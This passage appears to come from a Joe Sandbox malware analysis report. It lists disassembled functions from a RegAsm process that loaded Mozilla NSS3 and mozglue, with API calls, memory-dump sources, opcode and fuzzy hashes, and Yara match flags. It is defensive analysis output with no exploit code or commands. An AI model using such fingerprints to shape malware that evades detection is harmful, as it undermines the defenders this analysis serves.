                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C1BEA3C
                                                                                                        • free.MOZGLUE(?), ref: 6C1BEA69
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
                                                                                                        • String ID: http://
                                                                                                        • API String ID: 3982757857-1121587658
                                                                                                        • Opcode ID: 6a516b277a59ce27cb0a11d578d8f3388d0593241c7aae56b3267e988e661d86
                                                                                                        • Instruction ID: 6a820b553556d2d42c628c5196ed501d033f11eaeefa2020adb43a5704aa447d
                                                                                                        • Opcode Fuzzy Hash: 6a516b277a59ce27cb0a11d578d8f3388d0593241c7aae56b3267e988e661d86
                                                                                                        • Instruction Fuzzy Hash: D241AD7094460A4BEB605A688C817EA77A9AF2734CF1401A1EC90F7F41E231975ECEE2
                                                                                                        Function 6C1E6C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_DigestInit), ref: 6C1E6C66
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E6C94
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E6CA3
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E6CB9
                                                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C1E6CD5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$n,l
                                                                                                        • API String ID: 1003633598-1108940891
                                                                                                        • Opcode ID: a96edf955e15a91ac68d85a44303449d3a0f92f8f4aaea6802cfefa5cf635fe0
                                                                                                        • Instruction ID: 462f7a5d693f4c77310debef644fe01116ad983998fabc0769b5ba3ac5bfed5f
                                                                                                        • Opcode Fuzzy Hash: a96edf955e15a91ac68d85a44303449d3a0f92f8f4aaea6802cfefa5cf635fe0
                                                                                                        • Instruction Fuzzy Hash: 5321E63570054C9FDB00DB659D8AB9E37B9EB4A328F854029ED09D7F02DB35A948CBD2
                                                                                                        Function 6C093480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C093492
                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C0934A9
                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C0934EF
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C09350E
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C093522
                                                                                                        • __aulldiv.LIBCMT ref: 6C093552
                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C09357C
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C093592
                                                                                                          • Part of subcall function 6C0CAB89: EnterCriticalSection.KERNEL32(6C11E370,?,?,?,6C0934DE,6C11F6CC,?,?,?,?,?,?,?,6C093284), ref: 6C0CAB94
                                                                                                          • Part of subcall function 6C0CAB89: LeaveCriticalSection.KERNEL32(6C11E370,?,6C0934DE,6C11F6CC,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C0CABD1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                        • API String ID: 3634367004-706389432
                                                                                                        • Opcode ID: 594c3f10d3acda162c54ae17ad5dca2492203fd17942da350b00baf87ae3001e
                                                                                                        • Instruction ID: 0f1fbfa335ff243940626682552d0958440e0ba35884cf58d15db924804d3986
                                                                                                        • Opcode Fuzzy Hash: 594c3f10d3acda162c54ae17ad5dca2492203fd17942da350b00baf87ae3001e
                                                                                                        • Instruction Fuzzy Hash: 963170B1F012059BDF04DFB9CA49BAE77F9FB49304F104029E51593B60DA78A905EF61
                                                                                                        Function 6C1FECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C1FDE64), ref: 6C1FED0C
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1FED22
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C1FED4A
                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C1FED6B
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1FED38
                                                                                                          • Part of subcall function 6C134C70: TlsGetValue.KERNEL32(?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134C97
                                                                                                          • Part of subcall function 6C134C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CB0
                                                                                                          • Part of subcall function 6C134C70: PR_Unlock.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CC9
                                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C1FED52
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1FED83
                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C1FED95
                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C1FED9D
                                                                                                          • Part of subcall function 6C2164F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C21127C,00000000,00000000,00000000), ref: 6C21650E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                        • String ID: security
                                                                                                        • API String ID: 3323615905-3315324353
                                                                                                        • Opcode ID: ca5ecf0a5f16505141d990db718eb7777e1247dc48ec2f94ca585f2530c6632d
                                                                                                        • Instruction ID: 43b56fb001bb90bfb07e1aaca6ae681a46d534e2f17c70863feee7d15061fb70
                                                                                                        • Opcode Fuzzy Hash: ca5ecf0a5f16505141d990db718eb7777e1247dc48ec2f94ca585f2530c6632d
                                                                                                        • Instruction Fuzzy Hash: 8D116A769442186BE7205625AC84BBF72F8EF52B0CF010435ED2463E41FB29A60DC6F7
                                                                                                        Function 6C2C0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(Aborting,?,6C1A2357), ref: 6C2C0EB8
                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C1A2357), ref: 6C2C0EC0
                                                                                                        • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C2C0EE6
                                                                                                          • Part of subcall function 6C2C09D0: PR_Now.NSS3 ref: 6C2C0A22
                                                                                                          • Part of subcall function 6C2C09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C2C0A35
                                                                                                          • Part of subcall function 6C2C09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C2C0A66
                                                                                                          • Part of subcall function 6C2C09D0: PR_GetCurrentThread.NSS3 ref: 6C2C0A70
                                                                                                          • Part of subcall function 6C2C09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C2C0A9D
                                                                                                          • Part of subcall function 6C2C09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C2C0AC8
                                                                                                          • Part of subcall function 6C2C09D0: PR_vsmprintf.NSS3(?,?), ref: 6C2C0AE8
                                                                                                          • Part of subcall function 6C2C09D0: EnterCriticalSection.KERNEL32(?), ref: 6C2C0B19
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C2C0B48
                                                                                                          • Part of subcall function 6C2C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C2C0C76
                                                                                                          • Part of subcall function 6C2C09D0: PR_LogFlush.NSS3 ref: 6C2C0C7E
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C2C0EFA
                                                                                                          • Part of subcall function 6C1AAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C1AAF0E
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F16
                                                                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F1C
                                                                                                        • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F25
                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F2B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                        • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                        • API String ID: 3905088656-1374795319
                                                                                                        • Opcode ID: aaab96c4a8d6de4bf881ebe9ebe1b6e3f7f7d14f0e405604006408353cadccaa
                                                                                                        • Instruction ID: 4d9479f470cb9a18668856503c606ec390c0adc645180b002e38d396ddbbfa03
                                                                                                        • Opcode Fuzzy Hash: aaab96c4a8d6de4bf881ebe9ebe1b6e3f7f7d14f0e405604006408353cadccaa
                                                                                                        • Instruction Fuzzy Hash: 9AF0A4F6A001187BDA007BA0AC49C9B3E2DDF46664F004028FE0956602DB76E915D6B3
                                                                                                        Function 0042660D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00426634
                                                                                                        • _free.LIBCMT ref: 00426642
                                                                                                        • _free.LIBCMT ref: 0042664D
                                                                                                        • _free.LIBCMT ref: 00426621
                                                                                                          • Part of subcall function 0041D93B: HeapFree.KERNEL32(00000000,00000000,?,0041D18F,00000000,0043B6F4,0041D1D6,0040EEBE,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4), ref: 0041D951
                                                                                                          • Part of subcall function 0041D93B: GetLastError.KERNEL32(?,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4,?,?,?), ref: 0041D963
                                                                                                        • ___free_lc_time.LIBCMT ref: 0042666B
                                                                                                        • _free.LIBCMT ref: 00426676
                                                                                                        • _free.LIBCMT ref: 0042669B
                                                                                                        • _free.LIBCMT ref: 004266B2
                                                                                                        • _free.LIBCMT ref: 004266C1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                                                        • String ID: xLC
                                                                                                        • API String ID: 3704779436-381350105
                                                                                                        • Opcode ID: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
                                                                                                        • Instruction ID: fdfe39178027f3e5e6c57af64549801535ecf2e9aa55874642047572a4db4e51
                                                                                                        • Opcode Fuzzy Hash: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
                                                                                                        • Instruction Fuzzy Hash: 421194F2A10311ABDF206F76E985B9BB3A5EB01308F95093FE14897251CB3C9C91CA1C
                                                                                                        Function 6C224DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_NewArena_Util.NSS3(00000400), ref: 6C224DCB
                                                                                                          • Part of subcall function 6C210FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1B87ED,00000800,6C1AEF74,00000000), ref: 6C211000
                                                                                                          • Part of subcall function 6C210FF0: PR_NewLock.NSS3(?,00000800,6C1AEF74,00000000), ref: 6C211016
                                                                                                          • Part of subcall function 6C210FF0: PL_InitArenaPool.NSS3(00000000,security,6C1B87ED,00000008,?,00000800,6C1AEF74,00000000), ref: 6C21102B
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C224DE1
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C224DFF
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C224E59
                                                                                                          • Part of subcall function 6C20FAB0: free.MOZGLUE(?,-00000001,?,?,6C1AF673,00000000,00000000), ref: 6C20FAC7
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C2E300C,00000000), ref: 6C224EB8
                                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C224EFF
                                                                                                        • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C224F56
                                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C22521A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 1025791883-0
                                                                                                        • Opcode ID: 3ded492cc3d49aab02434fe474490e667805410ff71c6d05fc1ea890589fa5ca
                                                                                                        • Instruction ID: 7e4725205cf6ca10358dfc021d8214c430a2af6cc25f8687036fb6b6e3466103
                                                                                                        • Opcode Fuzzy Hash: 3ded492cc3d49aab02434fe474490e667805410ff71c6d05fc1ea890589fa5ca
                                                                                                        • Instruction Fuzzy Hash: 31F17F71E0020ACBDB04CF54D8407ADB7B1BF88359F258169ED15AB785EB79E981CF90
                                                                                                        Function 6C094480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$moz_xmalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3009372454-0
                                                                                                        • Opcode ID: 848948b978d811c615ea4e51873008c0660e04bb88d13f3f279c067cf88b0dd6
                                                                                                        • Instruction ID: 560e5aaedd5ffaa553628e1d81df85d4a21e98f79b42af905e56d20475f9be5a
                                                                                                        • Opcode Fuzzy Hash: 848948b978d811c615ea4e51873008c0660e04bb88d13f3f279c067cf88b0dd6
                                                                                                        • Instruction Fuzzy Hash: 7FB11471A001109FDB18DFBCD8D076E77E6AF46328F580668E436DBBD2D731A9409B82
                                                                                                        Function 6C1B4FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_NewLock.NSS3(00000001,00000000,6C300148,?,6C1C6FEC), ref: 6C1B502A
                                                                                                        • PR_NewLock.NSS3(00000001,00000000,6C300148,?,6C1C6FEC), ref: 6C1B5034
                                                                                                        • PL_NewHashTable.NSS3(00000000,6C20FE80,6C20FD30,6C25C350,00000000,00000000,00000001,00000000,6C300148,?,6C1C6FEC), ref: 6C1B5055
                                                                                                        • PL_NewHashTable.NSS3(00000000,6C20FE80,6C20FD30,6C25C350,00000000,00000000,?,00000001,00000000,6C300148,?,6C1C6FEC), ref: 6C1B506D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HashLockTable
                                                                                                        • String ID:
                                                                                                        • API String ID: 3862423791-0
                                                                                                        • Opcode ID: 151982f14c7a92e161a6b602e5c35bf69110b5409c2294524ab31b6615b7561c
                                                                                                        • Instruction ID: daea39fb0b17f20025933445bdcc6658624ade7b483c1d316d807be8b799a762
                                                                                                        • Opcode Fuzzy Hash: 151982f14c7a92e161a6b602e5c35bf69110b5409c2294524ab31b6615b7561c
                                                                                                        • Instruction Fuzzy Hash: 5D316FB1B012109FEB10DB66CA4EB473ABCEB27768F154125EA05A7A40E376D448CFE5
                                                                                                        Function 6C0FAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                        • String ID:
                                                                                                        • API String ID: 1192971331-0
                                                                                                        • Opcode ID: 783f2c253c4dd992492ca0dcb99764d149cea68a3c0b390fdb7c73e4a2b6728d
                                                                                                        • Instruction ID: 1610023bee1d66353a3606ea63c3b33dc691f84658568a252138d52051524c29
                                                                                                        • Opcode Fuzzy Hash: 783f2c253c4dd992492ca0dcb99764d149cea68a3c0b390fdb7c73e4a2b6728d
                                                                                                        • Instruction Fuzzy Hash: 32318FB1A053048FDB00EF78C64926EBBF0BF85304F11492DE89687701EB749598CB92
                                                                                                        Function 6C152E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C152F3D
                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C152FB9
                                                                                                        • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C153005
                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C1530EE
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C153131
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C153178
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
